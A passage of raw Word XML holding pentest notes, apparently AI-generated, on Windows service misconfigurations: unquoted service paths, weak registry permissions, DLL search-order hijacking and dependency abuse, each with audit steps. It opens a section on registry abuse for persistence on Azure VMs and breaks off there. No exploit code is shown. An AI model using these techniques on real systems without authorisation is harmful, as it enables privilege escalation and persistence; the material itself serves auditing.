        <w:t>C:\Program Files\My Service\service.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41939942" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>Windows might try to run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B54B0" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>C:\Program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9CCA5D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>or C:\Program Files\My.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C373E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Attackers can place malicious executables named like the truncated path (e.g., C:\Program.exe) to gain code execution under the service’s privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAFF6E7" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FCA4B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:lastRenderedPageBreak/>
        <w:t>Use PowerShell or wmic to get service binary paths and check if they are properly quoted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792078EF" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Look for unquoted paths with spaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCC52EC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="03287D38">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5296095D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Weak Registry Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F228B3" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Issue:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Windows Services configurations are stored in the registry under keys like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451034CB" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>\Services\&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>ServiceName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C61A74" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>If these registry keys or subkeys have weak permissions (e.g., writable by non-admin users), attackers can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF18B49" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Modify service parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507963BC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Change executable paths to point to malicious binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF3F292" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Alter startup types or dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ADAB9F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799DD1C5" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Use tools like Regedit with permission view or PowerShell scripts to check ACLs on service registry keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368558B2" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Ensure only SYSTEM and Admin groups have full control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A86E52" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="43587B5A">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D0878" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 DLL Hijacking / DLL Search Order Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5AC4C6" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Issue:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Services that load DLLs without specifying full paths rely on Windows’ DLL search order. If attackers place a malicious DLL with the same name in a higher priority directory (like the service’s working directory), the service will load the attacker’s DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083BD053" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>This leads to code execution within the context of the vulnerable service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B3C54F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A55AA5" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Identify service executables and their DLL dependencies (tools like Process Monitor or dependency walkers help).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629311A1" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Check the directories and file permissions where DLLs are loaded from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F183557" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Look for writable directories in the DLL search path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC32678" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="3480F368">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA79798" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.5 Service Dependencies Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6F7F6F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Issue:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t xml:space="preserve">Windows Services can depend on other services. If attackers can modify these dependencies or compromise dependent services, they can escalate privileges or influence service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F78774E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B85A4BB" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Check service dependency chains using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> qc &lt;service&gt; and PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D7906" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Verify permissions on dependent services and their binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE87B9F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Ensure dependency chains do not include insecure or untrusted services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB758D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="5206A0BE">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67399217" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Summary for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pentesters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Auditors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A65D8A" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>When auditing Windows Services for security weaknesses, focus on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575F4129" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:lastRenderedPageBreak/>
        <w:t>File system permissions on service executables and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C53AD6A" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Proper quoting of service binary paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130AE73" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Registry key permissions related to services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A13DD5" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>DLL loading paths and associated directory permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDD5DE" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Integrity and permissions of dependent services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3292760C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Misconfigurations in these areas commonly lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t>, key goals during Windows penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C78061" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="63516932">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94D0CB" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>Would you like me to help draft detailed commands or scripts for checking any of these areas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065C3E59" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D79687" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21388B4B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4C1CD0" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5520F407" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D192A3" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2C43E4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc199666195"/>
      <w:r>
        <w:t>Windows Registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4035796A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="5E7FAD73" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve"> is a powerful part of the OS that attackers often abuse during </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>compromise and post-exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve"> of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">, including on Azure. Below is a breakdown of </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how the registry is used during compromise</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">, with </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>persistence techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve"> relevant to </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Azure Windows VM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632DFBBA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="2026B3AD">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="761EFE6F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the Windows Registry?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E13EFCC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>The registry is a hierarchical database that stores low-level settings for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3282B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:t>The OS and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88E945" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:t>Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569A20E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:t>User configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307AD073" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">Auto-start entries (used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729B8BB0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="07C7BF4E">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="544ADCD1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Cases in Compromising a Windows VM</w:t>
      </w:r>
